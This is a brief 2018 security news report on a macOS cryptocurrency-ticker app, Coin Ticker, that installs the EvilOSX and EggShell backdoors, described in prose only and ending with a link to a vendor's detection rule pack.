Delaware, USA – October 30, 2018 — The researchers discovered an application for MacOS that monitors cryptocurrency rates and installs EvilOSX and EggShell backdoors on the system. It is not known for sure whether the attackers compromised the Coin Ticker app or whether the application was designed for malicious purposes. The latter option is more likely, as the website does not contain any information about the authors, and it was registered just a few months ago. When launching the application, it downloads shell and python scripts from the attackers’ server, which sequentially download from the GitHub repository and install EggShell and EvilOSX on the victim’s system. Malware also creates launch agents to run backdoors at startup automatically. It is noteworthy that attackers do not need elevated privileges to infect and control the attacked system.
How attackers spread this application and who is behind this cyber attack is not yet known. At the end of the summer, the Lazarus group conducted a similar attack on a cryptocurrency exchange, for this they used the Celas Trade Pro application, which installed Fallchill malware. Coin Ticker cannot boast of an equally sophisticated scheme, but at the same time, it represents a serious threat to cryptocurrency-related organizations, as many MacOS users are confident in their complete security. It is possible to detect the activity of backdoors in an organization’s network using APT Framework rule pack that displays internal hosts or targets that have triggered events matching several different kill chain stages and contains resources for Whitelisting: https://my.socprime.com/en/integrations/apt-framework-hpe-arcsight